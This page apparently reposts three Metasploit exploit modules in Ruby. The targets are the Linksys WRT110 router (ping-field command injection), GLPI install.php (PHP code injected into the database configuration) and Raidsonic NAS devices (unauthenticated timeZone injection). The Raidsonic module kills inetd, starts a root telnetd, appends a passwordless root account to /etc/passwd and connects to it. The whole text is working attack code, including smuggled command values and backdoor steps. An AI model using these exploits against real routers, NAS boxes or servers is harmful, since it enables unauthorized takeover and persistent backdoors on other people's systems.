

Thursday, September 26, 2013

[remote] - Linksys WRT110 Remote Command Execution

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerEcho def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys WRT110 Remote Command Execution', 'Description' => %q{ The Linksys WRT110 consumer router is vulnerable to a command injection exploit in the ping field of the web interface. }, 'Author' => [ 'Craig Young', # Vulnerability discovery 'joev ', # msf module 'juan vazquez' # module help + echo cmd stager ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-3568'], ['BID', '61151'], ['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] ], 'DisclosureDate' => 'Jul 12 2013', 'Privileged' => true, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSLE, 'Targets' => [ ['Linux mipsel Payload', { } ] ], 'DefaultTarget' => 0, )) register_options([ OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/HNAP1/' }) rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe end if res and res.code == 200 and res.body =~ /WRT110<\/ModelName>/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit test_login! execute_cmdstager end # Sends an HTTP request with authorization header to the router # Raises an exception unless the login is successful def test_login! 
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}") res = send_auth_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if not res or res.code == 401 or res.code == 404 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}") else print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}") end end # Run the command on the router def execute_command(cmd, opts) send_auth_request_cgi({ 'uri' => '/ping.cgi', 'method' => 'POST', 'vars_post' => { 'pingstr' => '& ' + cmd } }) Rex.sleep(1) # Give the device a second end # Helper methods def user; datastore['USERNAME']; end def pass; datastore['PASSWORD'] || ''; end def send_auth_request_cgi(opts={}, timeout=nil) timeout ||= datastore['TIMEOUT'] opts.merge!('authorization' => basic_auth(user, pass)) begin send_request_cgi(opts, timeout) rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end endend


[remote] - GLPI install.php Remote Command Execution

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'GLPI install.php Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the GLPI 'install.php' script. Users should use this exploit at his own risk, since it's going to overwrite database configuration. }, 'Author' => [ 'Tristan Leiter < research[at]navixia.com >', # Navixia Research Team ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-5696' ], [ 'URL', 'https://www.navixia.com/blog/entry/navixia-finds-critical-vulnerabilities-in-glpi-cve-2013-5696.html' ], [ 'URL', 'http://www.glpi-project.org/forum/viewtopic.php?id=33762' ], ], 'Privileged' => false, 'Platform' => ['php'], 'Payload' => { 'Space' => 4000, 'BadChars' => "#", 'DisableNops' => true, 'Keys' => ['php'] }, 'Arch' => ARCH_PHP, 'Targets' => [[ 'GLPI 0.84 or older', { }]], 'DisclosureDate' => 'Sep 12 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to GLPI', '/glpi/']) ], self.class) end def uri return target_uri.path end def check # Check if the GLPI instance is vulnerable res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php'), }) if not res or res.code != 200 return Exploit::CheckCode::Safe end re = '(version)(\\s+)(.*)(\\s+)(Copyright)' m = Regexp.new(re, Regexp::IGNORECASE) matched = m.match(res.body) if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/ print_good("Detected Version : #{matched[3]}") return Exploit::CheckCode::Appears elsif matched print_error("Version 
#{matched[3]} is not vulnerable") end return Exploit::CheckCode::Safe end def exploit print_status("Injecting the payload...") rand_arg = Rex::Text.rand_text_hex(10) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'install/install.php'), 'vars_post' => { 'install' => 'update_1', 'db_host' => 'localhost', 'db_user' => 'root', 'db_pass' => 'root', 'databasename' =>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*" } }) unless res and res.code == 200 and res.body =~ /You will update the GLPI database/ print_warning("Unexpected response while injecting the payload, trying to execute anyway...") end print_status("Executing the payload...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { rand_arg => '1', } }) endend


Wednesday, September 25, 2013

[remote] - Raidsonic NAS Devices Unauthenticated Remote Command Execution

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell include Msf::Exploit::FileDropper RESPONSE_PATTERN = "\ 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', 'Description' => %q{ Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon configuration, this module is set to ManualRanking and could cause target instability. }, 'Author' => [ 'Michael Messner ', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '90221' ], [ 'EDB', '24499' ], [ 'BID', '57958' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] ], 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => 'unix', 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0 )) register_advanced_options( [ OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) ], self.class) end def tel_timeout (datastore['TelnetTimeout'] || 10).to_i end def banner_timeout (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit telnet_port = rand(32767) + 
32768 print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") #first request cmd = "killall inetd" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending first request - killing inetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end #second request inetd_cfg = rand_text_alpha(8) cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending second request - configure inetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end register_file_for_cleanup("/tmp/#{inetd_cfg}") #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end #fourth request @user = rand_text_alpha(6) cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Trying to 
establish a telnet connection...") ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx }) if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end add_socket(sock) print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? sock.close fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") else print_good("#{rhost}:#{rport} - Telnet session successfully established...") end handler(sock) end def request(cmd) uri = '/cgi/time/timeHandler.cgi' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', #not working without setting encode_params to false! 'encode_params' => false, 'vars_post' => { "month" => "#{rand(12)}", "date" => "#{rand(30)}", "year" => "20#{rand(99)}", "hour" => "#{rand(12)}", "minute" => "#{rand(60)}", "ampm" => "PM", "timeZone" => "Amsterdam`#{cmd}`", "ntp_type" => "default", "ntpServer" => "none", "old_date" => " 1 12007", "old_time" => "1210", "old_timeZone" => "Amsterdam", "renew" => "0" } }) return res rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end def negotiate_telnet(sock) login = read_telnet(sock, "login: $") if login sock.put("#{@user}\r\n") end return read_telnet(sock, "> $") end def read_telnet(sock, pattern) begin Timeout.timeout(banner_timeout) do while(true) data = sock.get_once(-1, tel_timeout) return nil if not data or data.length == 0 if data =~ /#{pattern}/ return true end end end rescue ::Timeout::Error return nil end endend

